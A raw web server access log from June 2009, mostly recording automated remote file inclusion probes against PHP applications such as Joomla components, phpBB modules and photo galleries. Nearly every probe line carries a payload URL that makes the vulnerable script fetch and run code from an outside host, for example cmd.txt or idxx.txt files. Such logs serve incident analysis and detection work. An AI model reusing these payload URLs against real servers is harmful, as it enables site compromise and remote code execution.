218.249.36.194 - - [16/Jun/2009:03:33:43 -0400] "GET /include/mail.inc.php?skin_board_path=http://aboutav.com/cmd.txt??????? HTTP/1.1" 404 218 "-" "libwww-perl/5.79"
218.249.36.194 - - [16/Jun/2009:03:33:43 -0400] "GET /logs/include/mail.inc.php?skin_board_path=http://aboutav.com/cmd.txt??????? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
38.99.13.118 - - [16/Jun/2009:03:34:10 -0400] "GET /logs/error_log.Q107061600 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
84.201.208.50 - - [16/Jun/2009:03:34:31 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:03:34:31 -0400] "GET /logs/access_log.Q109052300%20%20//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:03:34:31 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jun/2009:03:35:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.249.36.194 - - [16/Jun/2009:03:35:32 -0400] "GET /logs/error_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aboutav.com/cmd.txt??????? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
74.54.32.201 - - [16/Jun/2009:03:35:45 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:03:35:45 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:03:35:45 -0400] "GET /logs/access_log.Q109051000//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
83.98.209.71 - - [16/Jun/2009:03:36:23 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:03:36:23 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:03:36:23 -0400] "GET /logs/access_log.Q109051000//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
83.98.209.71 - - [16/Jun/2009:03:36:23 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:03:36:23 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.98.209.71 - - [16/Jun/2009:03:36:23 -0400] "GET /logs/access_log.Q109051000//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
38.99.13.118 - - [16/Jun/2009:03:36:38 -0400] "GET /logs/access_log.Q108092900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
74.54.32.201 - - [16/Jun/2009:03:37:32 -0400] "GET /logs/access_log.Q109051000%20%20//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:03:38:13 -0400] "GET /logs/access_log.Q109051700/include/mail.inc.php?skin_board_path=http://aboutav.com/cmd.txt??????? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
84.201.208.50 - - [16/Jun/2009:03:38:50 -0400] "GET /logs/access_log.Q109051000%20%20//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
38.99.13.118 - - [16/Jun/2009:03:38:52 -0400] "GET /logs/access_log.Q108032000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.106.135.14 - - [16/Jun/2009:03:38:56 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:03:38:56 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:03:38:56 -0400] "GET /logs/access_log.Q109051000//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
84.32.195.2 - - [16/Jun/2009:03:39:48 -0400] "GET /logs/access_log.Q109052800/includes/messages.inc.php?include_path=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
84.32.195.2 - - [16/Jun/2009:03:39:48 -0400] "GET /logs/access_log.Q109052800/includes/messages.inc.php?include_path=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
84.32.195.2 - - [16/Jun/2009:03:39:49 -0400] "GET /includes/messages.inc.php?include_path=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 223 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
84.32.195.2 - - [16/Jun/2009:03:39:49 -0400] "GET /includes/messages.inc.php?include_path=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 223 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
200.93.147.154 - - [16/Jun/2009:03:39:53 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
200.93.147.154 - - [16/Jun/2009:03:39:53 -0400] "GET /logs/access_log.Q109053100/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
200.93.147.154 - - [16/Jun/2009:03:39:53 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
84.32.195.2 - - [16/Jun/2009:03:40:11 -0400] "GET /logs/access_log.Q109052800/includes/messages.inc.php?include_path=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.803"
84.32.195.2 - - [16/Jun/2009:03:40:12 -0400] "GET /includes/messages.inc.php?include_path=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.803"
84.32.195.2 - - [16/Jun/2009:03:40:12 -0400] "GET /logs/includes/messages.inc.php?include_path=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
84.32.195.2 - - [16/Jun/2009:03:40:14 -0400] "GET /logs/access_log.Q109052800/includes/messages.inc.php?include_path=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.803"
84.32.195.2 - - [16/Jun/2009:03:40:14 -0400] "GET /includes/messages.inc.php?include_path=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.803"
84.32.195.2 - - [16/Jun/2009:03:40:14 -0400] "GET /logs/includes/messages.inc.php?include_path=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
209.59.12.99 - - [16/Jun/2009:03:40:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.93.147.154 - - [16/Jun/2009:03:40:27 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
200.93.147.154 - - [16/Jun/2009:03:40:27 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.93.147.154 - - [16/Jun/2009:03:40:27 -0400] "GET /logs/access_log.Q109052200/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:03:40:57 -0400] "GET /logs/access_log.Q109052300%20%20//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
38.99.13.118 - - [16/Jun/2009:03:40:58 -0400] "GET /images/_notes/nav_lower_blue.jpg.mno HTTP/1.0" 200 252 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
84.32.195.2 - - [16/Jun/2009:03:41:00 -0400] "GET /logs/access_log.Q109060300/includes/messages.inc.php?include_path=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
84.32.195.2 - - [16/Jun/2009:03:41:00 -0400] "GET /logs/access_log.Q109060300/includes/messages.inc.php?include_path=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
84.32.195.2 - - [16/Jun/2009:03:41:20 -0400] "GET /logs/access_log.Q109060300/includes/messages.inc.php?include_path=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.803"
84.32.195.2 - - [16/Jun/2009:03:41:20 -0400] "GET /logs/access_log.Q109060300/includes/messages.inc.php?include_path=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.803"
217.147.29.190 - - [16/Jun/2009:03:42:19 -0400] "GET /logs/access_log.Q109051100//modules/My_eGallery/index.php?basepath=http://www.c21vox.tv/dtroy/idscan.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.808"
217.147.29.190 - - [16/Jun/2009:03:42:19 -0400] "GET //modules/My_eGallery/index.php?basepath=http://www.c21vox.tv/dtroy/idscan.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.808"
217.147.29.190 - - [16/Jun/2009:03:42:19 -0400] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.c21vox.tv/dtroy/idscan.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
190.144.44.36 - - [16/Jun/2009:03:42:26 -0400] "GET /logs/includes/messages.inc.php?include_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jun/2009:03:42:26 -0400] "GET /includes/messages.inc.php?include_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jun/2009:03:42:26 -0400] "GET /logs/access_log.Q109052800/includes/messages.inc.php?include_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jun/2009:03:42:31 -0400] "GET /logs/access_log.Q109060300/includes/messages.inc.php?include_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
217.147.29.190 - - [16/Jun/2009:03:42:32 -0400] "GET /logs/access_log.Q109052100//modules/My_eGallery/index.php?basepath=http://www.c21vox.tv/dtroy/idscan.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.808"
66.249.71.54 - - [16/Jun/2009:03:43:04 -0400] "GET /images/index4_impltpcs.jpg HTTP/1.1" 200 3206 "-" "Googlebot-Image/1.0"
38.99.44.103 - - [16/Jun/2009:03:43:08 -0400] "GET /logs/access_log.Q108061200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
84.201.208.50 - - [16/Jun/2009:03:43:11 -0400] "GET /logs/access_log.Q109052300%20%20//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.234.21.178 - - [16/Jun/2009:03:43:17 -0400] "GET /logs/access_log.Q109052500//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
218.234.21.178 - - [16/Jun/2009:03:43:17 -0400] "GET /logs//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 264 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
218.234.21.178 - - [16/Jun/2009:03:43:17 -0400] "GET //administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
121.165.73.157 - - [16/Jun/2009:03:43:17 -0400] "GET /logs/access_log.Q109052800/includes/messages.inc.php?include_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.165.73.157 - - [16/Jun/2009:03:43:37 -0400] "GET /logs/access_log.Q109060300/includes/messages.inc.php?include_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:03:44:26 -0400] "GET /includes/messages.inc.php?include_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:03:44:26 -0400] "GET /logs/includes/messages.inc.php?include_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:03:44:27 -0400] "GET /logs/access_log.Q109052800/includes/messages.inc.php?include_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:03:44:32 -0400] "GET /logs/access_log.Q109060300/includes/messages.inc.php?include_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:03:44:46 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:03:44:46 -0400] "GET /logs/access_log.Q109051000//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:03:44:46 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:03:44:51 -0400] "GET /logs/access_log.Q109052300//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:03:44:53 -0400] "GET /logs/access_log.Q109051000//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:03:44:55 -0400] "GET /logs/access_log.Q109052300//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jun/2009:03:45:02 -0400] "GET /logs/access_log.Q109052800%20%20/includes/messages.inc.php?include_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jun/2009:03:45:02 -0400] "GET /logs/access_log.Q109060300%20%20/includes/messages.inc.php?include_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
195.56.77.54 - - [16/Jun/2009:03:45:23 -0400] "GET /logs/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
195.56.77.54 - - [16/Jun/2009:03:45:23 -0400] "GET /logs/access_log.Q108112300%20%20/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
195.56.77.54 - - [16/Jun/2009:03:45:24 -0400] "GET /tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jun/2009:03:45:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.234.21.178 - - [16/Jun/2009:03:45:31 -0400] "GET /logs/error_log.Q109052500//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
84.201.208.50 - - [16/Jun/2009:03:45:47 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:03:45:47 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:03:45:47 -0400] "GET /logs/access_log.Q109051000//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:03:45:53 -0400] "GET /logs/access_log.Q109052300//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
74.6.17.151 - - [16/Jun/2009:03:45:56 -0400] "GET /images/ACE_Fall04_BestBuys.pdf HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.234.21.178 - - [16/Jun/2009:03:45:59 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
63.147.72.145 - - [16/Jun/2009:03:46:07 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jun/2009:03:46:07 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jun/2009:03:46:07 -0400] "GET /logs/access_log.Q109052200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
218.234.21.178 - - [16/Jun/2009:03:46:11 -0400] "GET //administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
218.234.21.178 - - [16/Jun/2009:03:46:11 -0400] "GET /logs/access_log.Q109052500//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
218.234.21.178 - - [16/Jun/2009:03:46:12 -0400] "GET /logs//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 264 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
66.98.166.76 - - [16/Jun/2009:03:46:12 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
66.98.166.76 - - [16/Jun/2009:03:46:12 -0400] "GET /logs/access_log.Q109052200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
66.98.166.76 - - [16/Jun/2009:03:46:13 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
83.98.209.71 - - [16/Jun/2009:03:46:19 -0400] "GET /logs/access_log.Q109051000//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
66.11.230.36 - - [16/Jun/2009:03:46:19 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
66.11.230.36 - - [16/Jun/2009:03:46:19 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
66.11.230.36 - - [16/Jun/2009:03:46:19 -0400] "GET /logs/access_log.Q109052200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
83.98.209.71 - - [16/Jun/2009:03:46:19 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
83.98.209.71 - - [16/Jun/2009:03:46:19 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.98.209.71 - - [16/Jun/2009:03:46:27 -0400] "GET /logs/access_log.Q109052300//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:03:46:41 -0400] "GET /logs/access_log.Q109051000%20%20//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:03:46:41 -0400] "GET /logs/access_log.Q109052300%20%20//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:03:46:42 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:03:46:43 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:03:46:43 -0400] "GET /logs/access_log.Q109051000//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:03:46:48 -0400] "GET /logs/access_log.Q109052300//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jun/2009:03:47:15 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
66.11.230.36 - - [16/Jun/2009:03:47:20 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:03:47:34 -0400] "GET /logs/access_log.Q109052800%20%20/includes/messages.inc.php?include_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.234.21.178 - - [16/Jun/2009:03:47:36 -0400] "GET /logs/error_log.Q109052500//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
218.249.36.194 - - [16/Jun/2009:03:47:42 -0400] "GET /logs/access_log.Q109060300%20%20/includes/messages.inc.php?include_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
66.98.166.76 - - [16/Jun/2009:03:48:05 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
218.234.21.178 - - [16/Jun/2009:03:48:10 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
38.99.13.118 - - [16/Jun/2009:03:48:22 -0400] "GET /logs/error_log.Q108052000 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
63.147.72.145 - - [16/Jun/2009:03:48:29 -0400] "GET /logs/access_log.Q109052600%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
69.94.125.100 - - [16/Jun/2009:03:48:32 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
69.94.125.100 - - [16/Jun/2009:03:48:32 -0400] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
69.94.125.100 - - [16/Jun/2009:03:48:32 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
66.11.230.36 - - [16/Jun/2009:03:48:37 -0400] "GET /logs/access_log.Q109052600%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
